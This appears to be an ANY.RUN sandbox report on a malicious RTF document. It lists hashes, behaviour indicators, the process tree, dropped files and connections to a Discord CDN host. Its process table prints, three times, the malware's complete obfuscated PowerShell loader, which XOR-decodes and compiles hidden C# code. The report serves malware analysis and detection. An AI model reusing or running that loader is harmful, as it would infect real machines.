analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dacfe1eb50341a2a4125cf0c677eccf1

Full analysis: https://app.any.run/tasks/0805ee75-d96d-43ba-ba6b-1c650fab648e
Verdict: Malicious activity
Analysis date: July 18, 2019, 03:18:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

DACFE1EB50341A2A4125CF0C677ECCF1

SHA1:

0B7C9F894910E7137D4BC202B03B81E8F84D56BA

SHA256:

D164497438703ED985CD906D82874743AF42FC760BC3B35A0818BC0CFF12CA17

SSDEEP:

3072:oHM0USWVyNN0USWVyNN0USWVyNN0USWVyNN0USWVyNN0USWVyNKtxS:10U3Eb0U3Eb0U3Eb0U3Eb0U3Eb0U3E4S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 3936)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3796)
      • powershell.exe (PID: 1784)
      • powershell.exe (PID: 3868)
    • Application was dropped or rewritten from another process

      • w51325.exe (PID: 2632)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 3936)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3796)
      • powershell.exe (PID: 3868)
      • cmd.exe (PID: 3844)
      • powershell.exe (PID: 1784)
    • PowerShell script executed

      • powershell.exe (PID: 3936)
      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3796)
      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 1784)
    • Executed via WMI

      • powershell.exe (PID: 3936)
      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3796)
      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 1784)
    • Executed via COM

      • EXCEL.EXE (PID: 3288)
      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 2936)
      • EXCEL.EXE (PID: 3040)
      • EXCEL.EXE (PID: 2828)
      • EXCEL.EXE (PID: 2864)
      • excelcnv.exe (PID: 3884)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 2924)
      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 3936)
      • powershell.exe (PID: 2252)
    • Starts CMD.EXE for commands execution

      • w51325.exe (PID: 2632)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 3288)
      • WINWORD.EXE (PID: 3012)
      • EXCEL.EXE (PID: 2936)
      • EXCEL.EXE (PID: 3040)
      • EXCEL.EXE (PID: 2828)
      • EXCEL.EXE (PID: 2864)
      • excelcnv.exe (PID: 3884)
    • Reads settings of System Certificates

      • powershell.exe (PID: 4020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
72
Monitored processes
29
Malicious processes
1
Suspicious processes
6

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe csc.exe excel.exe no specs cvtres.exe no specs powershell.exe csc.exe excel.exe no specs cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs csc.exe powershell.exe no specs excel.exe no specs cvtres.exe no specs w51325.exe powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dacfe1eb50341a2a4125cf0c677eccf1.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3948"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
4020powershell -WindowStyle Hidden function nd154 { param($tfa11d) $r341b = 'y885cc';$j331f85 = ''; for ($i = 0; $i -lt $tfa11d.length; $i+=2) { $cb3ad5d = [convert]::ToByte($tfa11d.Substring($i, 2), 16); $j331f85 += [char]($cb3ad5d -bxor $r341b[($i / 2) % $r341b.length]); } return $j331f85; } $v28163 = '0c4b515b04432a414b41060e424d4b5c0d04596b4146170614166a400d1710555d1b2a0d0d5d4a5a13301c4a4e5c00060a034d460a0d1e186b4c10171c5516710a021e565746170a1a4b0340100a175f18661a100d5d551b2a2c424d4b5c0d04596b4146170614167650175874324840010f105b18560f020a4b18405256415b5d0c18383d54547c0e13164a4c1d41081c4a56500f504b1a14700d170b41685a0a0d0d051a720617294a575622071d4a5d46104150651845160115515b151017184c51564306014c5d470d4330564c651711594b0a0756575171564133170b18530c01541a144b41110a175f184700541c0a00014a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c155e435b745754072f105a4a54111a5b11651513161b54515643100d594c5c00431c404c50110d5971564133170b185e5056521c0c1046171110565f151900185d00544a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c084135104a4c40020f294a574106000d1a116843130c5a545c00430a4c59410a00595d4041061117185a5a0c0f59575b0c005b1d0e107c0d17294c4a150452480f0c19362a174c684111430c0f5c07065655184d5c0d17595d5c0d06564d14185a1617594d515b1743180a0156514a42637c590f2a14485747174b5b735d470d06150b0a1b070f151a1415260d0d4a41650c0a174c0517311715755743062e1c5557471a4155186b50172f184b4c701111164a0553020f0a5d116843100d594c5c00431c404c50110d594e575c07431c0e590c064b30564c651711594a5e5752074f0b147c0d17294c4a1500514c010a02074f10564c1509541d5c0a514a58094d5a590a00594b4c54170a1a18515b17431f09010100575111437c0d17294c4a1505511a5c5b56554344185e5056521c0c105b07524c0c1017525b4c0d0c5756004d5c080252564c0c1a1c4a58105e105351001d5b5b035e5e30564c65171157625d470c4a025f57410c430c090c5301580471564133170b1856030106415e054651514c0c105351001d5b5b034f0d1d090d014b414a000d0057014c5b0b05535348000d0354024d0808005356485b0c54414a500351534b0d4f5a5d0d055e4471564133170b166250110c50435f5a170c594d0901050142456d7c0d17294c4a1500564a5c01084b3630564c651711500d03400a0d0d185e07070518015b085358105e10140c00405b0051554b170e5a505b05555b0d06075a55084001534f164d4c1505511d5e590c004a50435f5a170c594d0901050142457a4c17062265185106004b5c0e035e1849400b044f53015e5e19531b4008450e2a0d0d684c4743161c0a5a57575544755947100b185416740f0f165b70720f0c1b59541d504a42755947100b185416760c1300105c5000511d0e0e19534f0c5d0a5701574f140b1c58064f5901504b0d1c4f187c0d17294c4a1d0d551b5d00534d37167156415557511113051b5349095a1c4f161c0a5a575755550b110e16524d5e5a0f43341c5a7b590a06174c18465b024d0f0a080d060e186f50012015515d5b174b50034b41110a175f1846505b1a010908260d0f514a5a0d0e1c564c1b24060d7e575907060b6859410b4b3c564e5c110c17555d5b174d2a485d560a02157e575907060b167945130f105b59410a0c177c5941024a521a64691456480b0a004148175c0900574b5b0d0f000757490d08174a580a0059015451577c57420d0f16595c730a0f1c10565152564d101a0452571a0c5b015652490d010055524e0d5a0052531d0c5c040756480c5a0055531a0909040756400c000156571d08080455564c090f0057524e090f045b561b0d08005b534f085c0507571b090f0553564d0d5a015a53400809055756480d0a0101531a08010551561b0d0f0102534908010402564c0d0b015a5318085e0550564d0d5a01075341085c0556564c0d0b0101534108000550571a0908045b561c0d5c0152521808590454571b0c5b0057531f085e0054561d0c0800534150144b065b004009110e3311165b5d4610300d594a412a0d1f57185e51004b01055b061459684a5a00060a4b6b4102110d7156530c4b0a0b00565a52500368470c001c4b4b1b3017184a4c1d08511a0a011c58111c4c4d470d4349034545160115515b151017184c515643100d4a515b0443175c0900574b0a4c4a5c0d04595e5c0354564e114346171110565f15085a1b0f5b08411a41000d560041424b4c470a0d1e185e5056521c0c0566171110565f1b260e094c410e050c0b10515b17431005080e0a5f1f5c0e02565457745d5b04171103511e5e5150435a4c1706594b0a075657447b575b15060b4c16610c21004c5d1d05074f0f0d024d300c5a4b41110a175f105c4f51501409034a581f5d0d040657520510560b020b11104651514c0c186b4308405a0f56384b10170a1c434659530157540057745d5b04171165110e1e111c4c4d470d431f5d0d040657424545'; $v281632 = nd154($v28163); Add-Type -TypeDefinition $v281632; [u158ce9]::f194c4(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3288"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3936powershell -WindowStyle Hidden function nd154 { param($tfa11d) $r341b = 'y885cc';$j331f85 = ''; for ($i = 0; $i -lt $tfa11d.length; $i+=2) { $cb3ad5d = [convert]::ToByte($tfa11d.Substring($i, 2), 16); $j331f85 += [char]($cb3ad5d -bxor $r341b[($i / 2) % $r341b.length]); } return $j331f85; } $v28163 = '0c4b515b04432a414b41060e424d4b5c0d04596b4146170614166a400d1710555d1b2a0d0d5d4a5a13301c4a4e5c00060a034d460a0d1e186b4c10171c5516710a021e565746170a1a4b0340100a175f18661a100d5d551b2a2c424d4b5c0d04596b4146170614167650175874324840010f105b18560f020a4b18405256415b5d0c18383d54547c0e13164a4c1d41081c4a56500f504b1a14700d170b41685a0a0d0d051a720617294a575622071d4a5d46104150651845160115515b151017184c51564306014c5d470d4330564c651711594b0a0756575171564133170b18530c01541a144b41110a175f184700541c0a00014a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c155e435b745754072f105a4a54111a5b11651513161b54515643100d594c5c00431c404c50110d5971564133170b185e5056521c0c1046171110565f151900185d00544a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c084135104a4c40020f294a574106000d1a116843130c5a545c00430a4c59410a00595d4041061117185a5a0c0f59575b0c005b1d0e107c0d17294c4a150452480f0c19362a174c684111430c0f5c07065655184d5c0d17595d5c0d06564d14185a1617594d515b1743180a0156514a42637c590f2a14485747174b5b735d470d06150b0a1b070f151a1415260d0d4a41650c0a174c0517311715755743062e1c5557471a4155186b50172f184b4c701111164a0553020f0a5d116843100d594c5c00431c404c50110d594e575c07431c0e590c064b30564c651711594a5e5752074f0b147c0d17294c4a1500514c010a02074f10564c1509541d5c0a514a58094d5a590a00594b4c54170a1a18515b17431f09010100575111437c0d17294c4a1505511a5c5b56554344185e5056521c0c105b07524c0c1017525b4c0d0c5756004d5c080252564c0c1a1c4a58105e105351001d5b5b035e5e30564c65171157625d470c4a025f57410c430c090c5301580471564133170b1856030106415e054651514c0c105351001d5b5b034f0d1d090d014b414a000d0057014c5b0b05535348000d0354024d0808005356485b0c54414a500351534b0d4f5a5d0d055e4471564133170b166250110c50435f5a170c594d0901050142456d7c0d17294c4a1500564a5c01084b3630564c651711500d03400a0d0d185e07070518015b085358105e10140c00405b0051554b170e5a505b05555b0d06075a55084001534f164d4c1505511d5e590c004a50435f5a170c594d0901050142457a4c17062265185106004b5c0e035e1849400b044f53015e5e19531b4008450e2a0d0d684c4743161c0a5a57575544755947100b185416740f0f165b70720f0c1b59541d504a42755947100b185416760c1300105c5000511d0e0e19534f0c5d0a5701574f140b1c58064f5901504b0d1c4f187c0d17294c4a1d0d551b5d00534d37167156415557511113051b5349095a1c4f161c0a5a575755550b110e16524d5e5a0f43341c5a7b590a06174c18465b024d0f0a080d060e186f50012015515d5b174b50034b41110a175f1846505b1a010908260d0f514a5a0d0e1c564c1b24060d7e575907060b6859410b4b3c564e5c110c17555d5b174d2a485d560a02157e575907060b167945130f105b59410a0c177c5941024a521a64691456480b0a004148175c0900574b5b0d0f000757490d08174a580a0059015451577c57420d0f16595c730a0f1c10565152564d101a0452571a0c5b015652490d010055524e0d5a0052531d0c5c040756480c5a0055531a0909040756400c000156571d08080455564c090f0057524e090f045b561b0d08005b534f085c0507571b090f0553564d0d5a015a53400809055756480d0a0101531a08010551561b0d0f0102534908010402564c0d0b015a5318085e0550564d0d5a01075341085c0556564c0d0b0101534108000550571a0908045b561c0d5c0152521808590454571b0c5b0057531f085e0054561d0c0800534150144b065b004009110e3311165b5d4610300d594a412a0d1f57185e51004b01055b061459684a5a00060a4b6b4102110d7156530c4b0a0b00565a52500368470c001c4b4b1b3017184a4c1d08511a0a011c58111c4c4d470d4349034545160115515b151017184c515643100d4a515b0443175c0900574b0a4c4a5c0d04595e5c0354564e114346171110565f15085a1b0f5b08411a41000d560041424b4c470a0d1e185e5056521c0c0566171110565f1b260e094c410e050c0b10515b17431005080e0a5f1f5c0e02565457745d5b04171103511e5e5150435a4c1706594b0a075657447b575b15060b4c16610c21004c5d1d05074f0f0d024d300c5a4b41110a175f105c4f51501409034a581f5d0d040657520510560b020b11104651514c0c186b4308405a0f56384b10170a1c434659530157540057745d5b04171165110e1e111c4c4d470d431f5d0d040657424545'; $v281632 = nd154($v28163); Add-Type -TypeDefinition $v281632; [u158ce9]::f194c4(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2660"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lw46ncpd.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2936"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2288C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESCB01.tmp" "c:\Users\admin\AppData\Local\Temp\CSCCB00.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
2252powershell -WindowStyle Hidden function nd154 { param($tfa11d) $r341b = 'y885cc';$j331f85 = ''; for ($i = 0; $i -lt $tfa11d.length; $i+=2) { $cb3ad5d = [convert]::ToByte($tfa11d.Substring($i, 2), 16); $j331f85 += [char]($cb3ad5d -bxor $r341b[($i / 2) % $r341b.length]); } return $j331f85; } $v28163 = '0c4b515b04432a414b41060e424d4b5c0d04596b4146170614166a400d1710555d1b2a0d0d5d4a5a13301c4a4e5c00060a034d460a0d1e186b4c10171c5516710a021e565746170a1a4b0340100a175f18661a100d5d551b2a2c424d4b5c0d04596b4146170614167650175874324840010f105b18560f020a4b18405256415b5d0c18383d54547c0e13164a4c1d41081c4a56500f504b1a14700d170b41685a0a0d0d051a720617294a575622071d4a5d46104150651845160115515b151017184c51564306014c5d470d4330564c651711594b0a0756575171564133170b18530c01541a144b41110a175f184700541c0a00014a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c155e435b745754072f105a4a54111a5b11651513161b54515643100d594c5c00431c404c50110d5971564133170b185e5056521c0c1046171110565f151900185d00544a58227c54592a0e09574a414b41125d4a5b060f4a0a1a194326174c4a4c330c10564c084135104a4c40020f294a574106000d1a116843130c5a545c00430a4c59410a00595d4041061117185a5a0c0f59575b0c005b1d0e107c0d17294c4a150452480f0c19362a174c684111430c0f5c07065655184d5c0d17595d5c0d06564d14185a1617594d515b1743180a0156514a42637c590f2a14485747174b5b735d470d06150b0a1b070f151a1415260d0d4a41650c0a174c0517311715755743062e1c5557471a4155186b50172f184b4c701111164a0553020f0a5d116843100d594c5c00431c404c50110d594e575c07431c0e590c064b30564c651711594a5e5752074f0b147c0d17294c4a1500514c010a02074f10564c1509541d5c0a514a58094d5a590a00594b4c54170a1a18515b17431f09010100575111437c0d17294c4a1505511a5c5b56554344185e5056521c0c105b07524c0c1017525b4c0d0c5756004d5c080252564c0c1a1c4a58105e105351001d5b5b035e5e30564c65171157625d470c4a025f57410c430c090c5301580471564133170b1856030106415e054651514c0c105351001d5b5b034f0d1d090d014b414a000d0057014c5b0b05535348000d0354024d0808005356485b0c54414a500351534b0d4f5a5d0d055e4471564133170b166250110c50435f5a170c594d0901050142456d7c0d17294c4a1500564a5c01084b3630564c651711500d03400a0d0d185e07070518015b085358105e10140c00405b0051554b170e5a505b05555b0d06075a55084001534f164d4c1505511d5e590c004a50435f5a170c594d0901050142457a4c17062265185106004b5c0e035e1849400b044f53015e5e19531b4008450e2a0d0d684c4743161c0a5a57575544755947100b185416740f0f165b70720f0c1b59541d504a42755947100b185416760c1300105c5000511d0e0e19534f0c5d0a5701574f140b1c58064f5901504b0d1c4f187c0d17294c4a1d0d551b5d00534d37167156415557511113051b5349095a1c4f161c0a5a575755550b110e16524d5e5a0f43341c5a7b590a06174c18465b024d0f0a080d060e186f50012015515d5b174b50034b41110a175f1846505b1a010908260d0f514a5a0d0e1c564c1b24060d7e575907060b6859410b4b3c564e5c110c17555d5b174d2a485d560a02157e575907060b167945130f105b59410a0c177c5941024a521a64691456480b0a004148175c0900574b5b0d0f000757490d08174a580a0059015451577c57420d0f16595c730a0f1c10565152564d101a0452571a0c5b015652490d010055524e0d5a0052531d0c5c040756480c5a0055531a0909040756400c000156571d08080455564c090f0057524e090f045b561b0d08005b534f085c0507571b090f0553564d0d5a015a53400809055756480d0a0101531a08010551561b0d0f0102534908010402564c0d0b015a5318085e0550564d0d5a01075341085c0556564c0d0b0101534108000550571a0908045b561c0d5c0152521808590454571b0c5b0057531f085e0054561d0c0800534150144b065b004009110e3311165b5d4610300d594a412a0d1f57185e51004b01055b061459684a5a00060a4b6b4102110d7156530c4b0a0b00565a52500368470c001c4b4b1b3017184a4c1d08511a0a011c58111c4c4d470d4349034545160115515b151017184c515643100d4a515b0443175c0900574b0a4c4a5c0d04595e5c0354564e114346171110565f15085a1b0f5b08411a41000d560041424b4c470a0d1e185e5056521c0c0566171110565f1b260e094c410e050c0b10515b17431005080e0a5f1f5c0e02565457745d5b04171103511e5e5150435a4c1706594b0a075657447b575b15060b4c16610c21004c5d1d05074f0f0d024d300c5a4b41110a175f105c4f51501409034a581f5d0d040657520510560b020b11104651514c0c186b4308405a0f56384b10170a1c434659530157540057745d5b04171165110e1e111c4c4d470d431f5d0d040657424545'; $v281632 = nd154($v28163); Add-Type -TypeDefinition $v281632; [u158ce9]::f194c4(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2924"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\fnw94v5v.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
4 670
Read events
3 851
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
12
Text files
13
Unknown types
6

Dropped files

PID
Process
Filename
Type
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAF89.tmp.cvr
MD5:
SHA256:
3948EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRBAD4.tmp.cvr
MD5:
SHA256:
3288EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC44A.tmp.cvr
MD5:
SHA256:
4020powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\66VQG91LFS5V5CRPM3HE.temp
MD5:
SHA256:
2936EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC989.tmp.cvr
MD5:
SHA256:
2660csc.exeC:\Users\admin\AppData\Local\Temp\CSCCB00.tmp
MD5:
SHA256:
2660csc.exeC:\Users\admin\AppData\Local\Temp\lw46ncpd.pdb
MD5:
SHA256:
3936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FX6V78QKYRJ3O3FCFBN4.temp
MD5:
SHA256:
2288cvtres.exeC:\Users\admin\AppData\Local\Temp\RESCB01.tmp
MD5:
SHA256:
2660csc.exeC:\Users\admin\AppData\Local\Temp\lw46ncpd.dll
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4020
powershell.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
2252
powershell.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
3936
powershell.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared

DNS requests

Domain
IP
Reputation
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.129.233
  • 162.159.134.233
  • 162.159.135.233
shared

Threats

No threats detected
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144